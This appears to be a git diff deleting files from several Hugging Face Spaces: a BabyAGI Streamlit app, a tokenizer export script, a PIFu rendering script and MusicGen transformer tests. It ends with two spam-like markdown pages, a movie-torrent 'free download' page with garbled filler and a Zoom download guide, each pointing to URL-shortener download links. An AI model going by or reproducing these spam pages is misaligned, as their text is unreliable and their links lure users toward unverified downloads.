List[Dict], objective: str) -> List[Dict]: - """Prioritize tasks.""" - task_names = [t["task_name"] for t in task_list] - next_task_id = int(this_task_id) + 1 - response = task_prioritization_chain.run(task_names=task_names, - next_task_id=next_task_id, - objective=objective) - new_tasks = response.split('\n') - prioritized_task_list = [] - for task_string in new_tasks: - if not task_string.strip(): - continue - task_parts = task_string.strip().split(".", 1) - if len(task_parts) == 2: - task_id = task_parts[0].strip() - task_name = task_parts[1].strip() - prioritized_task_list.append({"task_id": task_id, "task_name": task_name}) - return prioritized_task_list - - def _get_top_tasks(vectorstore, query: str, k: int) -> List[str]: - """Get the top k tasks based on the query.""" - results = vectorstore.similarity_search_with_score(query, k=k) - if not results: - return [] - sorted_results, _ = zip(*sorted(results, key=lambda x: x[1], reverse=True)) - return [str(item.metadata['task']) for item in sorted_results] - - def execute_task(vectorstore, execution_chain: LLMChain, objective: str, task: str, k: int = 5) -> str: - """Execute a task.""" - context = _get_top_tasks(vectorstore, query=objective, k=k) - return execution_chain.run(objective=objective, context=context, task=task) - - - # Modify BabyAGI class to print results using Streamlit functions - class BabyAGI(Chain, BaseModel): - """Controller model for the BabyAGI agent.""" - - task_list: deque = Field(default_factory=deque) - task_creation_chain: TaskCreationChain = Field(...) - task_prioritization_chain: TaskPrioritizationChain = Field(...) - execution_chain: AgentExecutor = Field(...) - task_id_counter: int = Field(1) - vectorstore: VectorStore = Field(init=False) - max_iterations: Optional[int] = None - - class Config: - """Configuration for this pydantic object.""" - arbitrary_types_allowed = True - - def add_task(self, task: Dict): - self.task_list.append(task) - - def print_task_list(self): - st.write("\n*****TASK LIST*****\n") - for t in self.task_list: - st.write(f'{t["task_id"]}: {t["task_name"]}') - - def print_next_task(self, task: Dict): - st.write("\n*****NEXT TASK*****\n") - st.write(f'{task["task_id"]}: {task["task_name"]}') # fixed variable t to task - - def print_task_result(self, result: str): - st.write("\n*****TASK RESULT*****\n") - st.write(result) - - - @property - def input_keys(self) -> List[str]: - return ["objective"] - - @property - def output_keys(self) -> List[str]: - return [] - - # running the actual agent with a while loop - - def _call(self, inputs: Dict[str, Any]) -> Dict[str, Any]: - """Run the agent.""" - objective = inputs['objective'] - first_task = inputs.get("first_task", "Make a todo list") - self.add_task({"task_id": 1, "task_name": first_task}) - num_iters = 0 - - # interate until done - while True: - if self.task_list: - self.print_task_list() - - # Step 1: Pull the first task - task = self.task_list.popleft() - self.print_next_task(task) - - # Step 2: Execute the task - result = execute_task( - self.vectorstore, self.execution_chain, objective, task["task_name"] - ) - this_task_id = int(task["task_id"]) - self.print_task_result(result) - - # Step 3: Store the result locally in FAISS vector database - result_id = f"result_{task['task_id']}" - self.vectorstore.add_texts( - texts=[result], - metadatas=[{"task": task["task_name"]}], - ids=[result_id], - ) - - # Step 4: Create new tasks and reprioritize task list - new_tasks = get_next_task( - self.task_creation_chain, result, task["task_name"], [t["task_name"] for t in self.task_list], objective - ) - for new_task in new_tasks: - self.task_id_counter += 1 - new_task.update({"task_id": self.task_id_counter}) - self.add_task(new_task) - self.task_list = deque( - prioritize_tasks( - self.task_prioritization_chain, this_task_id, list(self.task_list), objective - ) - ) - num_iters += 1 - if self.max_iterations is not None and num_iters == self.max_iterations: - print("\033[91m\033[1m" + "\n*****TASK ENDING*****\n" + "\033[0m\033[0m") - break - return {} - - @classmethod - def from_llm( - cls, - llm: BaseLLM, - vectorstore: VectorStore, - verbose: bool = False, - **kwargs - ) -> "BabyAGI": - """Initialize the BabyAGI Controller.""" - task_creation_chain = TaskCreationChain.from_llm( - llm, verbose=verbose - ) - task_prioritization_chain = TaskPrioritizationChain.from_llm( - llm, verbose=verbose - ) - llm_chain = LLMChain(llm=llm, prompt=prompt) - tool_names = [tool.name for tool in tools] - agent = ZeroShotAgent(llm_chain=llm_chain, allowed_tools=tool_names) - agent_executor = AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True) - return cls( - task_creation_chain=task_creation_chain, - task_prioritization_chain=task_prioritization_chain, - execution_chain=agent_executor, - vectorstore=vectorstore, - **kwargs - ) - - # Streamlit interface - - st.title('BabyAGI') - - # Input for objective and max iterations - objective = st.text_area("Enter the objective:", "Give a non-military solution that President Biden could use to solve the war in Ukraine minimizing loss of life, allowing for the global distribution of grain and increasing stability of nuclear facilities") - max_iterations = st.slider("Max Iterations", 1, 10, 3) - - - # Button to run the code - if st.button('Run'): - # BabyAGI Initialization and execution - llm = OpenAI(temperature=0) - verbose = False - baby_agi = BabyAGI.from_llm( - llm=llm, - vectorstore=vectorstore, - verbose=verbose, - max_iterations=max_iterations - ) - baby_agi({"objective": objective}) - - -else: - st.title('BabyAGI') - st.error("Please provide both the OpenAI and SERPAPI API keys to proceed.") - st.image("./babyai.png") - st.markdown('''Learn more join https://www.meetup.com/florence-aws-user-group-meetup/''') - - - diff --git a/spaces/eson/tokenizer-arena/vocab/gpt_nexo_20b/convert_vocab_to_txt.py b/spaces/eson/tokenizer-arena/vocab/gpt_nexo_20b/convert_vocab_to_txt.py deleted file mode 100644 index 2dc413c1a23466f591e62232796d853aee47ee0a..0000000000000000000000000000000000000000 --- a/spaces/eson/tokenizer-arena/vocab/gpt_nexo_20b/convert_vocab_to_txt.py +++ /dev/null @@ -1,15 +0,0 @@ -import json - -from tokenizers import Tokenizer - -tokenizer = Tokenizer.from_file("20B_tokenizer.json") - -vocab = tokenizer.get_vocab() - -sorted_vocab = sorted(vocab.items(), key=lambda kv:kv[1]) - -f_out = open("20B_tokenizer.txt", "w", encoding="utf-8") -for token, idx in sorted_vocab: - decoded_token = tokenizer.decode([idx]) - f_out.write(json.dumps({"id": idx, "token": token, "token_decode": decoded_token}) + "\t" + token + "\t" + decoded_token + "\n") - diff --git a/spaces/eswat/Image-and-3D-Model-Creator/PIFu/apps/render_data.py b/spaces/eswat/Image-and-3D-Model-Creator/PIFu/apps/render_data.py deleted file mode 100644 index 563c03fba6e304eced73ca283152a968a65c3b8e..0000000000000000000000000000000000000000 --- a/spaces/eswat/Image-and-3D-Model-Creator/PIFu/apps/render_data.py +++ /dev/null @@ -1,290 +0,0 @@ -#from data.config import raw_dataset, render_dataset, archive_dataset, model_list, zip_path - -from lib.renderer.camera import Camera -import numpy as np -from lib.renderer.mesh import load_obj_mesh, compute_tangent, compute_normal, load_obj_mesh_mtl -from lib.renderer.camera import Camera -import os -import cv2 -import time -import math -import random -import pyexr -import argparse -from tqdm import tqdm - - -def make_rotate(rx, ry, rz): - sinX = np.sin(rx) - sinY = np.sin(ry) - sinZ = np.sin(rz) - - cosX = np.cos(rx) - cosY = np.cos(ry) - cosZ = np.cos(rz) - - Rx = np.zeros((3,3)) - Rx[0, 0] = 1.0 - Rx[1, 1] = cosX - Rx[1, 2] = -sinX - Rx[2, 1] = sinX - Rx[2, 2] = cosX - - Ry = np.zeros((3,3)) - Ry[0, 0] = cosY - Ry[0, 2] = sinY - Ry[1, 1] = 1.0 - Ry[2, 0] = -sinY - Ry[2, 2] = cosY - - Rz = np.zeros((3,3)) - Rz[0, 0] = cosZ - Rz[0, 1] = -sinZ - Rz[1, 0] = sinZ - Rz[1, 1] = cosZ - Rz[2, 2] = 1.0 - - R = np.matmul(np.matmul(Rz,Ry),Rx) - return R - -def rotateSH(SH, R): - SHn = SH - - # 1st order - SHn[1] = R[1,1]*SH[1] - R[1,2]*SH[2] + R[1,0]*SH[3] - SHn[2] = -R[2,1]*SH[1] + R[2,2]*SH[2] - R[2,0]*SH[3] - SHn[3] = R[0,1]*SH[1] - R[0,2]*SH[2] + R[0,0]*SH[3] - - # 2nd order - SHn[4:,0] = rotateBand2(SH[4:,0],R) - SHn[4:,1] = rotateBand2(SH[4:,1],R) - SHn[4:,2] = rotateBand2(SH[4:,2],R) - - return SHn - -def rotateBand2(x, R): - s_c3 = 0.94617469575 - s_c4 = -0.31539156525 - s_c5 = 0.54627421529 - - s_c_scale = 1.0/0.91529123286551084 - s_c_scale_inv = 0.91529123286551084 - - s_rc2 = 1.5853309190550713*s_c_scale - s_c4_div_c3 = s_c4/s_c3 - s_c4_div_c3_x2 = (s_c4/s_c3)*2.0 - - s_scale_dst2 = s_c3 * s_c_scale_inv - s_scale_dst4 = s_c5 * s_c_scale_inv - - sh0 = x[3] + x[4] + x[4] - x[1] - sh1 = x[0] + s_rc2*x[2] + x[3] + x[4] - sh2 = x[0] - sh3 = -x[3] - sh4 = -x[1] - - r2x = R[0][0] + R[0][1] - r2y = R[1][0] + R[1][1] - r2z = R[2][0] + R[2][1] - - r3x = R[0][0] + R[0][2] - r3y = R[1][0] + R[1][2] - r3z = R[2][0] + R[2][2] - - r4x = R[0][1] + R[0][2] - r4y = R[1][1] + R[1][2] - r4z = R[2][1] + R[2][2] - - sh0_x = sh0 * R[0][0] - sh0_y = sh0 * R[1][0] - d0 = sh0_x * R[1][0] - d1 = sh0_y * R[2][0] - d2 = sh0 * (R[2][0] * R[2][0] + s_c4_div_c3) - d3 = sh0_x * R[2][0] - d4 = sh0_x * R[0][0] - sh0_y * R[1][0] - - sh1_x = sh1 * R[0][2] - sh1_y = sh1 * R[1][2] - d0 += sh1_x * R[1][2] - d1 += sh1_y * R[2][2] - d2 += sh1 * (R[2][2] * R[2][2] + s_c4_div_c3) - d3 += sh1_x * R[2][2] - d4 += sh1_x * R[0][2] - sh1_y * R[1][2] - - sh2_x = sh2 * r2x - sh2_y = sh2 * r2y - d0 += sh2_x * r2y - d1 += sh2_y * r2z - d2 += sh2 * (r2z * r2z + s_c4_div_c3_x2) - d3 += sh2_x * r2z - d4 += sh2_x * r2x - sh2_y * r2y - - sh3_x = sh3 * r3x - sh3_y = sh3 * r3y - d0 += sh3_x * r3y - d1 += sh3_y * r3z - d2 += sh3 * (r3z * r3z + s_c4_div_c3_x2) - d3 += sh3_x * r3z - d4 += sh3_x * r3x - sh3_y * r3y - - sh4_x = sh4 * r4x - sh4_y = sh4 * r4y - d0 += sh4_x * r4y - d1 += sh4_y * r4z - d2 += sh4 * (r4z * r4z + s_c4_div_c3_x2) - d3 += sh4_x * r4z - d4 += sh4_x * r4x - sh4_y * r4y - - dst = x - dst[0] = d0 - dst[1] = -d1 - dst[2] = d2 * s_scale_dst2 - dst[3] = -d3 - dst[4] = d4 * s_scale_dst4 - - return dst - -def render_prt_ortho(out_path, folder_name, subject_name, shs, rndr, rndr_uv, im_size, angl_step=4, n_light=1, pitch=[0]): - cam = Camera(width=im_size, height=im_size) - cam.ortho_ratio = 0.4 * (512 / im_size) - cam.near = -100 - cam.far = 100 - cam.sanity_check() - - # set path for obj, prt - mesh_file = os.path.join(folder_name, subject_name + '_100k.obj') - if not os.path.exists(mesh_file): - print('ERROR: obj file does not exist!!', mesh_file) - return - prt_file = os.path.join(folder_name, 'bounce', 'bounce0.txt') - if not os.path.exists(prt_file): - print('ERROR: prt file does not exist!!!', prt_file) - return - face_prt_file = os.path.join(folder_name, 'bounce', 'face.npy') - if not os.path.exists(face_prt_file): - print('ERROR: face prt file does not exist!!!', prt_file) - return - text_file = os.path.join(folder_name, 'tex', subject_name + '_dif_2k.jpg') - if not os.path.exists(text_file): - print('ERROR: dif file does not exist!!', text_file) - return - - texture_image = cv2.imread(text_file) - texture_image = cv2.cvtColor(texture_image, cv2.COLOR_BGR2RGB) - - vertices, faces, normals, faces_normals, textures, face_textures = load_obj_mesh(mesh_file, with_normal=True, with_texture=True) - vmin = vertices.min(0) - vmax = vertices.max(0) - up_axis = 1 if (vmax-vmin).argmax() == 1 else 2 - - vmed = np.median(vertices, 0) - vmed[up_axis] = 0.5*(vmax[up_axis]+vmin[up_axis]) - y_scale = 180/(vmax[up_axis] - vmin[up_axis]) - - rndr.set_norm_mat(y_scale, vmed) - rndr_uv.set_norm_mat(y_scale, vmed) - - tan, bitan = compute_tangent(vertices, faces, normals, textures, face_textures) - prt = np.loadtxt(prt_file) - face_prt = np.load(face_prt_file) - rndr.set_mesh(vertices, faces, normals, faces_normals, textures, face_textures, prt, face_prt, tan, bitan) - rndr.set_albedo(texture_image) - - rndr_uv.set_mesh(vertices, faces, normals, faces_normals, textures, face_textures, prt, face_prt, tan, bitan) - rndr_uv.set_albedo(texture_image) - - os.makedirs(os.path.join(out_path, 'GEO', 'OBJ', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'PARAM', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'RENDER', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'MASK', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_RENDER', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_MASK', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_POS', subject_name),exist_ok=True) - os.makedirs(os.path.join(out_path, 'UV_NORMAL', subject_name),exist_ok=True) - - if not os.path.exists(os.path.join(out_path, 'val.txt')): - f = open(os.path.join(out_path, 'val.txt'), 'w') - f.close() - - # copy obj file - cmd = 'cp %s %s' % (mesh_file, os.path.join(out_path, 'GEO', 'OBJ', subject_name)) - print(cmd) - os.system(cmd) - - for p in pitch: - for y in tqdm(range(0, 360, angl_step)): - R = np.matmul(make_rotate(math.radians(p), 0, 0), make_rotate(0, math.radians(y), 0)) - if up_axis == 2: - R = np.matmul(R, make_rotate(math.radians(90),0,0)) - - rndr.rot_matrix = R - rndr_uv.rot_matrix = R - rndr.set_camera(cam) - rndr_uv.set_camera(cam) - - for j in range(n_light): - sh_id = random.randint(0,shs.shape[0]-1) - sh = shs[sh_id] - sh_angle = 0.2*np.pi*(random.random()-0.5) - sh = rotateSH(sh, make_rotate(0, sh_angle, 0).T) - - dic = {'sh': sh, 'ortho_ratio': cam.ortho_ratio, 'scale': y_scale, 'center': vmed, 'R': R} - - rndr.set_sh(sh) - rndr.analytic = False - rndr.use_inverse_depth = False - rndr.display() - - out_all_f = rndr.get_color(0) - out_mask = out_all_f[:,:,3] - out_all_f = cv2.cvtColor(out_all_f, cv2.COLOR_RGBA2BGR) - - np.save(os.path.join(out_path, 'PARAM', subject_name, '%d_%d_%02d.npy'%(y,p,j)),dic) - cv2.imwrite(os.path.join(out_path, 'RENDER', subject_name, '%d_%d_%02d.jpg'%(y,p,j)),255.0*out_all_f) - cv2.imwrite(os.path.join(out_path, 'MASK', subject_name, '%d_%d_%02d.png'%(y,p,j)),255.0*out_mask) - - rndr_uv.set_sh(sh) - rndr_uv.analytic = False - rndr_uv.use_inverse_depth = False - rndr_uv.display() - - uv_color = rndr_uv.get_color(0) - uv_color = cv2.cvtColor(uv_color, cv2.COLOR_RGBA2BGR) - cv2.imwrite(os.path.join(out_path, 'UV_RENDER', subject_name, '%d_%d_%02d.jpg'%(y,p,j)),255.0*uv_color) - - if y == 0 and j == 0 and p == pitch[0]: - uv_pos = rndr_uv.get_color(1) - uv_mask = uv_pos[:,:,3] - cv2.imwrite(os.path.join(out_path, 'UV_MASK', subject_name, '00.png'),255.0*uv_mask) - - data = {'default': uv_pos[:,:,:3]} # default is a reserved name - pyexr.write(os.path.join(out_path, 'UV_POS', subject_name, '00.exr'), data) - - uv_nml = rndr_uv.get_color(2) - uv_nml = cv2.cvtColor(uv_nml, cv2.COLOR_RGBA2BGR) - cv2.imwrite(os.path.join(out_path, 'UV_NORMAL', subject_name, '00.png'),255.0*uv_nml) - - -if __name__ == '__main__': - shs = np.load('./env_sh.npy') - - parser = argparse.ArgumentParser() - parser.add_argument('-i', '--input', type=str, default='/home/shunsuke/Downloads/rp_dennis_posed_004_OBJ') - parser.add_argument('-o', '--out_dir', type=str, default='/home/shunsuke/Documents/hf_human') - parser.add_argument('-m', '--ms_rate', type=int, default=1, help='higher ms rate results in less aliased output. MESA renderer only supports ms_rate=1.') - parser.add_argument('-e', '--egl', action='store_true', help='egl rendering option. use this when rendering with headless server with NVIDIA GPU') - parser.add_argument('-s', '--size', type=int, default=512, help='rendering image size') - args = parser.parse_args() - - # NOTE: GL context has to be created before any other OpenGL function loads. - from lib.renderer.gl.init_gl import initialize_GL_context - initialize_GL_context(width=args.size, height=args.size, egl=args.egl) - - from lib.renderer.gl.prt_render import PRTRender - rndr = PRTRender(width=args.size, height=args.size, ms_rate=args.ms_rate, egl=args.egl) - rndr_uv = PRTRender(width=args.size, height=args.size, uv_mode=True, egl=args.egl) - - if args.input[-1] == '/': - args.input = args.input[:-1] - subject_name = args.input.split('/')[-1][:-4] - render_prt_ortho(args.out_dir, args.input, subject_name, shs, rndr, rndr_uv, args.size, 1, 1, pitch=[0]) \ No newline at end of file diff --git a/spaces/facebook/MusicGen/tests/modules/test_transformer.py b/spaces/facebook/MusicGen/tests/modules/test_transformer.py deleted file mode 100644 index ee74ba06614bd8dafd204ecc84e8fb74527cee69..0000000000000000000000000000000000000000 --- a/spaces/facebook/MusicGen/tests/modules/test_transformer.py +++ /dev/null @@ -1,253 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from itertools import product - -import pytest -import torch - -from audiocraft.modules.transformer import ( - StreamingMultiheadAttention, StreamingTransformer, set_efficient_attention_backend) - - -def test_transformer_causal_streaming(): - torch.manual_seed(1234) - - for context, custom in product([None, 10], [False, True]): - # Test that causality and receptive fields are properly handled. - # looking at the gradients - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=custom, - dropout=0.) - steps = 20 - for k in [0, 10, 15, 19]: - x = torch.randn(4, steps, 16, requires_grad=True) - y = tr(x) - y[:, k].abs().sum().backward() - if k + 1 < steps: - assert torch.allclose(x.grad[:, k + 1:], torch.tensor(0.)), x.grad[:, k + 1:].norm() - assert not torch.allclose(x.grad[:, :k + 1], torch.tensor(0.)), x.grad[:, :k + 1].norm() - if context is not None and k > context: - limit = k - context - 1 - assert torch.allclose(x.grad[:, :limit], - torch.tensor(0.)), x.grad[:, :limit].norm() - - # Now check that streaming gives the same result at batch eval. - x = torch.randn(4, steps, 16) - y = tr(x) - ys = [] - with tr.streaming(): - for k in range(steps): - chunk = x[:, k:k + 1, :] - ys.append(tr(chunk)) - y_stream = torch.cat(ys, dim=1) - delta = torch.norm(y_stream - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_transformer_vs_pytorch(): - torch.manual_seed(1234) - # Check that in the non causal setting, we get the same result as - # PyTorch Transformer encoder. - for custom in [False, True]: - tr = StreamingTransformer( - 16, 4, 2, - causal=False, custom=custom, dropout=0., positional_scale=0.) - layer = torch.nn.TransformerEncoderLayer(16, 4, dropout=0., batch_first=True) - tr_ref = torch.nn.TransformerEncoder(layer, 2) - tr.load_state_dict(tr_ref.state_dict()) - - x = torch.randn(4, 20, 16) - y = tr(x) - y2 = tr_ref(x) - delta = torch.norm(y2 - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_streaming_api(): - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0.) - tr.eval() - steps = 12 - x = torch.randn(1, steps, 16) - - with torch.no_grad(): - with tr.streaming(): - _ = tr(x[:, :1]) - state = {k: v.clone() for k, v in tr.get_streaming_state().items()} - y = tr(x[:, 1:2]) - tr.set_streaming_state(state) - y2 = tr(x[:, 1:2]) - assert torch.allclose(y, y2), (y - y2).norm() - assert tr.flush() is None - - -def test_memory_efficient(): - for backend in ['torch']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1) - tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - assert torch.allclose(y, y2), ((y - y2).norm(), backend) - - -def test_attention_as_float32(): - torch.manual_seed(1234) - cases = [ - {'custom': True}, - {'custom': False}, - ] - for case in cases: - tr = StreamingTransformer(16, 4, 2, dropout=0., dtype=torch.bfloat16, **case) - tr_float32 = StreamingTransformer( - 16, 4, 2, dropout=0., attention_as_float32=True, dtype=torch.bfloat16, **case) - if not case['custom']: - # we are not using autocast here because it doesn't really - # work as expected on CPU, so we have to manually cast the weights of the MHA. - for layer in tr_float32.layers: - layer.self_attn.mha.to(torch.float32) - tr_float32.load_state_dict(tr.state_dict()) - steps = 12 - x = torch.randn(3, steps, 16, dtype=torch.bfloat16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_float32(x) - assert not torch.allclose(y, y2), (y - y2).norm() - - -@torch.no_grad() -def test_streaming_memory_efficient(): - for backend in ['torch']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0., custom=True) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, causal=True) - tr.load_state_dict(tr_mem_efficient.state_dict()) - tr.eval() - tr_mem_efficient.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr_mem_efficient.streaming(): - outs = [] - # frame_sizes = [2] + [1] * (steps - 2) - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr_mem_efficient(frame)) - - out = torch.cat(outs, dim=1) - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_cross_attention(): - torch.manual_seed(1234) - for norm_first in [True, False]: - m = StreamingTransformer( - 16, 4, 2, cross_attention=False, norm_first=norm_first, dropout=0., custom=True) - m_cross = StreamingTransformer( - 16, 4, 2, cross_attention=True, norm_first=norm_first, dropout=0., custom=True) - m_cross.load_state_dict(m.state_dict(), strict=False) - x = torch.randn(2, 5, 16) - cross_x = torch.randn(2, 3, 16) - y_ref = m(x) - y_cross_zero = m_cross(x, cross_attention_src=0 * cross_x) - # With norm_first, the two should be exactly the same, - # but with norm_first=False, we get 2 normalization in a row - # and the epsilon value leads to a tiny change. - atol = 0. if norm_first else 1e-6 - print((y_ref - y_cross_zero).norm() / y_ref.norm()) - assert torch.allclose(y_ref, y_cross_zero, atol=atol) - - # We now expect a difference even with a generous atol of 1e-2. - y_cross = m_cross(x, cross_attention_src=cross_x) - assert not torch.allclose(y_cross, y_cross_zero, atol=1e-2) - - with pytest.raises(AssertionError): - _ = m_cross(x) - _ = m(x, cross_attention_src=cross_x) - - -def test_cross_attention_compat(): - torch.manual_seed(1234) - num_heads = 2 - dim = num_heads * 64 - with pytest.raises(AssertionError): - StreamingMultiheadAttention(dim, num_heads, causal=True, cross_attention=True) - - cross_attn = StreamingMultiheadAttention( - dim, num_heads, dropout=0, cross_attention=True, custom=True) - ref_attn = torch.nn.MultiheadAttention(dim, num_heads, dropout=0, batch_first=True) - - # We can load the regular attention state dict - # so we have compat when loading old checkpoints. - cross_attn.load_state_dict(ref_attn.state_dict()) - - queries = torch.randn(3, 7, dim) - keys = torch.randn(3, 9, dim) - values = torch.randn(3, 9, dim) - - y = cross_attn(queries, keys, values)[0] - y_ref = ref_attn(queries, keys, values)[0] - assert torch.allclose(y, y_ref, atol=1e-7), (y - y_ref).norm() / y_ref.norm() - - # Now let's check that streaming is working properly. - with cross_attn.streaming(): - ys = [] - for step in range(queries.shape[1]): - ys.append(cross_attn(queries[:, step: step + 1], keys, values)[0]) - y_streaming = torch.cat(ys, dim=1) - assert torch.allclose(y_streaming, y, atol=1e-7) - - -def test_repeat_kv(): - torch.manual_seed(1234) - num_heads = 8 - kv_repeat = 4 - dim = num_heads * 64 - with pytest.raises(AssertionError): - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, cross_attention=True) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, custom=True) - x = torch.randn(4, 18, dim) - y = mha(x, x, x)[0] - assert x.shape == y.shape - - -def test_qk_layer_norm(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, bias_attn=False) - steps = 12 - x = torch.randn(3, steps, 16) - y = tr(x) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, cross_attention=True) - z = torch.randn(3, 21, 16) - y = tr(x, cross_attention_src=z) - assert y.shape == x.shape diff --git a/spaces/falterWliame/Face_Mask_Detection/Mr. X 3 Hindi Movie Torrent Free Download Hd BEST.md b/spaces/falterWliame/Face_Mask_Detection/Mr. X 3 Hindi Movie Torrent Free Download Hd BEST.md deleted file mode 100644 index 692631c1f4cd62ea4b76a62e4548d8f924bdd1cb..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Mr. X 3 Hindi Movie Torrent Free Download Hd BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Mr. X 3 hindi movie torrent free download hd


      Downloadhttps://urlca.com/2uDe1A



      - -(3) Excluding currency, energy and significant scope impacts. 19. 2019 Annual Report. Page 12. These examples also demonstrate the ... 1fdad05405
      -
      -
      -

      diff --git a/spaces/fatiXbelha/sd/Download Zoom for Mac Zoom The Most Reliable and User-Friendly Video Conferencing App.md b/spaces/fatiXbelha/sd/Download Zoom for Mac Zoom The Most Reliable and User-Friendly Video Conferencing App.md deleted file mode 100644 index 36b806251a69640acabc2615a46a6207cc5010ed..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Download Zoom for Mac Zoom The Most Reliable and User-Friendly Video Conferencing App.md +++ /dev/null @@ -1,115 +0,0 @@ -
      -

      How to Download Zoom for Macbook Pro 2021

      -

      Zoom is one of the most popular and reliable video conferencing platforms in the world. It allows you to host or join online meetings, webinars, classes, events, and more with ease and efficiency. Whether you need to communicate with your colleagues, clients, friends, or family, Zoom can help you stay connected and productive.

      -

      If you have a Macbook Pro 2021, you might be wondering how to download and use Zoom on your device. In this article, we will show you how to do that in simple steps. We will also share some tips and tricks for optimizing your Zoom experience on your Macbook Pro 2021.

      -

      download zoom for macbook pro 2021


      DOWNLOADhttps://urllie.com/2uNDDf



      -

      What You Need to Download Zoom for Macbook Pro 2021

      -

      Before you download Zoom for your Macbook Pro 2021, you need to make sure that your device meets the minimum requirements and specifications for running the app. Here are some of the things you need:

      -
        -
      • A Macbook Pro 2021 with macOS Big Sur (11.0) or later
      • -
      • An internet connection with at least 2 Mbps of bandwidth
      • -
      • A webcam, microphone, and speakers (built-in or external)
      • -
      • A valid email address (for creating a Zoom account)
      • -
      • A credit card or PayPal account (for purchasing a paid Zoom plan)
      • -
      -

      How to Create a Zoom Account

      -

      To host or join a Zoom meeting, you need to have a Zoom account. You can create a free or paid account depending on your needs and preferences. Here are the steps to create a Zoom account:

      -
        -
      1. Go to https://zoom.us/ and click on "Sign up, it's free" at the top right corner of the page.
      2. -
      3. Enter your date of birth and click on "Continue".
      4. -
      5. Enter your email address or sign in with your SSO, Google, or Facebook account.
      6. -
      7. Check your email inbox and click on the confirmation link sent by Zoom.
      8. -
      9. Follow the instructions to complete your profile and choose your plan.
      10. -
      -

      You can also create a Zoom account from the app after downloading it. We will show you how to do that in the next section.

      -

      How to Download and Install the Zoom App for Macbook Pro 2021

      -

      There are two ways to download and install the Zoom app for your Macbook Pro 2021: from the official website or from the App Store. Here are the steps for both methods:

      -

      From the official website

      -
        -
      1. Go to https://zoom.us/download and click on "Download" under "Zoom Client for Meetings".
      2. -
      3. Double-click on the downloaded file (Zoom.pkg) and follow the instructions to install the app.
      4. -
      5. If prompted, enter your administrator credentials and allow Zoom to access your microphone and camera.
      6. -
      7. Launch the app and sign in with your Zoom account or create a new one.
      8. -
      -

      From the App Store

      -
        -
      1. Open the App Store on your Macbook Pro 2021 and search for "Zoom" in the search bar.
      2. -
      3. Click on "Get" or "Install" next to the app icon and enter your Apple ID and password if prompted.
      4. -
      5. Wait for the app to download and install on your device.
      6. -
      7. Launch the app and sign in with your Zoom account or create a new one.
      8. -
      -

      How to Host or Join a Zoom Meeting on Macbook Pro 2021

      -

      Once you have the Zoom app installed on your Macbook Pro 2021, you can host or join a Zoom meeting with ease. Here are the steps for both scenarios:

      -

      How to host a Zoom meeting

      -
        -
      1. Launch the Zoom app and sign in with your Zoom account.
      2. -
      3. Click on "New Meeting" at the top left corner of the app window.
      4. -
      5. Select your preferred options for video, audio, and personal meeting ID.
      6. -
      7. Click on "Start Meeting" to begin your meeting.
      8. -
      9. Invite participants by clicking on "Invite" at the bottom of the meeting window and choosing your preferred method (email, contacts, copy URL, etc.).
      10. -
      11. Manage your meeting by using the controls at the bottom of the meeting window, such as mute/unmute, stop/start video, share screen, chat, record, etc.
      12. -
      13. End your meeting by clicking on "End Meeting" at the bottom right corner of the meeting window and choosing "End Meeting for All".
      14. -
      -

      How to join a Zoom meeting

      -
        -
      1. Launch the Zoom app and sign in with your Zoom account.
      2. -
      3. Click on "Join" at the top right corner of the app window.
      4. -
      5. Enter the meeting ID or link and your display name.
      6. -
      7. Select your preferred options for video and audio.
      8. -
      9. Click on "Join" to enter the meeting.
      10. -
      11. Participate in the meeting by using the controls at the bottom of the meeting window, such as mute/unmute, stop/start video, raise hand, chat, etc.
      12. -
      13. Leave the meeting by clicking on "Leave Meeting" at the bottom right corner of the meeting window and choosing "Leave Meeting".
      14. -
      -

      Tips and Tricks for Using Zoom on Macbook Pro 2021

      -

      To make the most out of your Zoom experience on your Macbook Pro 2021, here are some tips and tricks that you can try:

      -

      How to download zoom for macbook pro 2021
      -Download zoom for macbook pro 2021 free
      -Download zoom for macbook pro 2021 with M1 chip
      -Download zoom for macbook pro 2021 without App Store
      -Download zoom for macbook pro 2021 from official website
      -Download zoom for macbook pro 2021 latest version
